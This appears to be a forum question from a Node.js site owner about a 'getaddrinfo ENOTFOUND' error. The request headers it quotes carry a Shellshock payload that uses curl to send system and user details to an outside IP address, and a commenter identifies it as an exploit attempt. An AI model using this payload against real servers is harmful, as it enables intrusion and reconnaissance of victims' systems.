# NodeJS getaddrinfo ENOTFOUND during `whoami` call from google

Tags: node.js, seo

I have a nodeJS website in production and started seeing this exception: `getaddrinfo ENOTFOUND`

Headers received during this call:

```
{"cache-control":"no-cache","connection":"Keep-Alive","pragma":"no-cache","cookie":"() { :; }; curl http://85.18.113.32/gate.php?w1-`uname`-`uname -p`-`whoami` ","referer":"http://google.com ","user-agent":"() { :; }; curl http://85.18.113.32/gate.php?w1-`uname`-`uname -p`-`whoami` ","test":"() { :; }; curl http://85.18.113.32/gate.php?w1-`uname`-`uname -p`-`whoami` "}
```

This seems to be coming from google but I am not sure what to do for this in my nodeJS environment. Any help/pointers will be appreciated!

Comment: I doubt that request actually came from google. It appears someone was most likely trying to exploit your server.